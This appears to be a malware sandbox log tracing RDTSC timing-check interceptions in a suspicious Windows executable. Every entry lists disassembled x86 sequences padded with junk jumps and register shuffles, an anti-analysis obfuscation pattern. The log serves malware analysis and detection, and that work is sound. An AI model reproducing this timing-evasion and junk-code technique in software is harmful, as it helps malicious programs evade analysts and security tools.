Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0729 second address: 78B07C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f push eax 0x00000010 mov bl, 2Dh 0x00000012 pop eax 0x00000013 popad 0x00000014 mov eax, dword ptr [ebx+64h] 0x00000017 pushad 0x00000018 mov ebx, 6CC83BE0h 0x0000001d mov ax, dx 0x00000020 popad 0x00000021 mov dword ptr [esi+28h], eax 0x00000024 jmp 00007FA94CE9192Bh 0x00000029 mov eax, dword ptr [ebx+68h] 0x0000002c pushad 0x0000002d push esi 0x0000002e mov ch, bl 0x00000030 pop esi 0x00000031 mov bx, 2A40h 0x00000035 popad 0x00000036 mov dword ptr [esi+2Ch], eax 0x00000039 pushad 0x0000003a call 00007FA94CE91935h 0x0000003f mov si, 9807h 0x00000043 pop esi 0x00000044 pushfd 0x00000045 jmp 00007FA94CE9192Dh 0x0000004a adc esi, 055C94F6h 0x00000050 jmp 00007FA94CE91931h 0x00000055 popfd 0x00000056 popad 0x00000057 mov ax, word ptr [ebx+6Ch] 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FA94CE9192Dh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B07C9 second address: 78B07D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE9352Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B07D9 second address: 78B07DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B07DD second address: 78B08AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c jmp 00007FA94CE93537h 0x00000011 mov ax, word ptr [ebx+00000088h] 0x00000018 jmp 00007FA94CE93536h 0x0000001d mov word ptr [esi+32h], ax 0x00000021 pushad 0x00000022 pushad 0x00000023 jmp 00007FA94CE9352Ch 0x00000028 mov ecx, 0D39B5A1h 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007FA94CE9352Eh 0x00000034 and ax, 1538h 0x00000039 jmp 00007FA94CE9352Bh 0x0000003e popfd 0x0000003f popad 0x00000040 mov eax, dword ptr [ebx+0000008Ch] 0x00000046 jmp 00007FA94CE93536h 0x0000004b mov dword ptr [esi+34h], eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 mov ax, dx 0x00000054 pushfd 0x00000055 jmp 00007FA94CE93539h 0x0000005a xor cx, 8D36h 0x0000005f jmp 00007FA94CE93531h 0x00000064 popfd 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B08AD second address: 78B08CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ch, 5Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B08CA second address: 78B08F5 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 5CBD7F7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bx, 1946h 0x0000000d popad 0x0000000e mov dword ptr [esi+38h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA94CE93538h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B08F5 second address: 78B0907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE9192Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0907 second address: 78B0960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+1Ch] 0x0000000e jmp 00007FA94CE93536h 0x00000013 mov dword ptr [esi+3Ch], eax 0x00000016 jmp 00007FA94CE93530h 0x0000001b mov eax, dword ptr [ebx+20h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA94CE93537h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0960 second address: 78B0966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0966 second address: 78B096A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B096A second address: 78B09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9192Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+40h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007FA94CE9192Eh 0x00000017 xor ecx, 58830F68h 0x0000001d jmp 00007FA94CE9192Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B09A2 second address: 78B09D3 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 815Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f jmp 00007FA94CE93532h 0x00000014 push 00000001h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA94CE9352Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B09D3 second address: 78B09D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B09D7 second address: 78B09DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B09DD second address: 78B09E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B09E3 second address: 78B09E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B09E7 second address: 78B09EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B09EB second address: 78B0A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FA94CE93534h 0x0000000e push eax 0x0000000f jmp 00007FA94CE9352Bh 0x00000014 nop 0x00000015 pushad 0x00000016 push esi 0x00000017 pushfd 0x00000018 jmp 00007FA94CE9352Bh 0x0000001d jmp 00007FA94CE93533h 0x00000022 popfd 0x00000023 pop esi 0x00000024 pushfd 0x00000025 jmp 00007FA94CE93539h 0x0000002a sbb cx, 5C56h 0x0000002f jmp 00007FA94CE93531h 0x00000034 popfd 0x00000035 popad 0x00000036 lea eax, dword ptr [ebp-10h] 0x00000039 jmp 00007FA94CE9352Eh 0x0000003e nop 0x0000003f jmp 00007FA94CE93530h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0A93 second address: 78B0A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0A97 second address: 78B0A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0A9D second address: 78B0AA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0AA3 second address: 78B0AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0AA7 second address: 78B0AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0AAB second address: 78B0ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA94CE93538h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0B2C second address: 78B0B5B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA94CE91930h 0x00000008 adc ax, BA58h 0x0000000d jmp 00007FA94CE9192Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0B5B second address: 78B0B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0B5F second address: 78B0B7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0B7A second address: 78B0BC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FA9BCAC2052h 0x0000000f jmp 00007FA94CE9352Eh 0x00000014 mov eax, dword ptr [ebp-0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA94CE93537h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0BC7 second address: 78B0C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007FA94CE9192Bh 0x0000000c xor si, A13Eh 0x00000011 jmp 00007FA94CE91939h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+04h], eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FA94CE9192Ch 0x00000024 and esi, 690B4E38h 0x0000002a jmp 00007FA94CE9192Bh 0x0000002f popfd 0x00000030 jmp 00007FA94CE91938h 0x00000035 popad 0x00000036 lea eax, dword ptr [ebx+78h] 0x00000039 jmp 00007FA94CE91930h 0x0000003e push 00000001h 0x00000040 jmp 00007FA94CE91930h 0x00000045 nop 0x00000046 jmp 00007FA94CE91930h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FA94CE9192Eh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0C7E second address: 78B0CF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA94CE93534h 0x00000011 jmp 00007FA94CE93535h 0x00000016 popfd 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FA94CE9352Eh 0x0000001e add cx, 1218h 0x00000023 jmp 00007FA94CE9352Bh 0x00000028 popfd 0x00000029 push eax 0x0000002a pop edi 0x0000002b popad 0x0000002c popad 0x0000002d lea eax, dword ptr [ebp-08h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FA94CE93531h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0CF5 second address: 78B0D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov eax, 020B9D43h 0x00000010 pushfd 0x00000011 jmp 00007FA94CE91938h 0x00000016 add ch, 00000008h 0x00000019 jmp 00007FA94CE9192Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0D41 second address: 78B0D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0D45 second address: 78B0D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0D4B second address: 78B0D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE93538h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0D67 second address: 78B0D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9192Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 1EC5A286h 0x00000014 jmp 00007FA94CE91937h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0E2A second address: 78B0E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7042h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0E33 second address: 78B0E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebp-04h] 0x0000000a jmp 00007FA94CE9192Fh 0x0000000f mov dword ptr [esi+08h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA94CE91935h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0E66 second address: 78B0E88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+70h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA94CE93535h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0E88 second address: 78B0ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA94CE91937h 0x00000008 pop eax 0x00000009 mov esi, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push 00000001h 0x00000010 jmp 00007FA94CE9192Bh 0x00000015 nop 0x00000016 jmp 00007FA94CE91936h 0x0000001b push eax 0x0000001c pushad 0x0000001d mov di, A6D4h 0x00000021 push eax 0x00000022 push edx 0x00000023 movsx ebx, cx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0ED7 second address: 78B0F15 instructions: 0x00000000 rdtsc 0x00000002 call 00007FA94CE93534h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007FA94CE93531h 0x00000011 lea eax, dword ptr [ebp-18h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA94CE9352Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0F15 second address: 78B0F5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FA94CE9192Eh 0x0000000f push eax 0x00000010 jmp 00007FA94CE9192Bh 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA94CE91930h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0F5A second address: 78B0F69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0F69 second address: 78B0F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0F6F second address: 78B0F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0FA1 second address: 78B0FE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 jmp 00007FA94CE91933h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f jmp 00007FA94CE91936h 0x00000014 test edi, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ebx, 1D0720E0h 0x0000001e mov di, 6B0Ch 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0FE3 second address: 78B0FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0FE9 second address: 78B0FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B0FED second address: 78B101C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FA9BCAC1BE0h 0x0000000e jmp 00007FA94CE93538h 0x00000013 mov eax, dword ptr [ebp-14h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B101C second address: 78B1039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B1039 second address: 78B10BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA94CE93537h 0x00000009 sbb esi, 48A9F27Eh 0x0000000f jmp 00007FA94CE93539h 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ecx, esi 0x0000001d jmp 00007FA94CE9352Ah 0x00000022 mov dword ptr [esi+0Ch], eax 0x00000025 jmp 00007FA94CE93530h 0x0000002a mov edx, 775606ECh 0x0000002f jmp 00007FA94CE93530h 0x00000034 sub eax, eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FA94CE9352Ch 0x0000003d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B10BE second address: 78B10D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3DD263B4h 0x00000008 movsx edx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lock cmpxchg dword ptr [edx], ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B10D6 second address: 78B10DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B10DA second address: 78B10DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B10DE second address: 78B10E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B10E4 second address: 78B10EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B10EA second address: 78B10EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B10EE second address: 78B10F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B10F2 second address: 78B1144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FA94CE93533h 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007FA94CE93539h 0x00000018 sbb cx, 1A36h 0x0000001d jmp 00007FA94CE93531h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B1144 second address: 78B11BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c jmp 00007FA94CE9192Ch 0x00000011 mov ebx, esi 0x00000013 popad 0x00000014 jne 00007FA9BCABFE97h 0x0000001a jmp 00007FA94CE9192Ch 0x0000001f mov edx, dword ptr [ebp+08h] 0x00000022 jmp 00007FA94CE91930h 0x00000027 mov eax, dword ptr [esi] 0x00000029 jmp 00007FA94CE91930h 0x0000002e mov dword ptr [edx], eax 0x00000030 jmp 00007FA94CE91930h 0x00000035 mov eax, dword ptr [esi+04h] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B11BC second address: 78B11F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA94CE93533h 0x0000000a adc si, CF8Eh 0x0000000f jmp 00007FA94CE93539h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B11F4 second address: 78B121B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA94CE9192Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B121B second address: 78B1259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 543FA002h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA94CE93531h 0x00000017 adc si, C3D6h 0x0000001c jmp 00007FA94CE93531h 0x00000021 popfd 0x00000022 mov bx, ax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B1259 second address: 78B127D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 67F6285Eh 0x00000008 call 00007FA94CE9192Fh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [edx+08h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 movsx ebx, ax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B127D second address: 78B12F1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA94CE9352Ch 0x00000008 or ch, 00000058h 0x0000000b jmp 00007FA94CE9352Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 call 00007FA94CE93538h 0x00000018 mov di, si 0x0000001b pop esi 0x0000001c popad 0x0000001d mov eax, dword ptr [esi+0Ch] 0x00000020 jmp 00007FA94CE9352Dh 0x00000025 mov dword ptr [edx+0Ch], eax 0x00000028 pushad 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b mov ax, dx 0x0000002e popad 0x0000002f mov eax, dword ptr [esi+10h] 0x00000032 jmp 00007FA94CE93531h 0x00000037 mov dword ptr [edx+10h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B12F1 second address: 78B12F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B12F5 second address: 78B1308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B1308 second address: 78B130E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 78B130E second address: 78B1312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
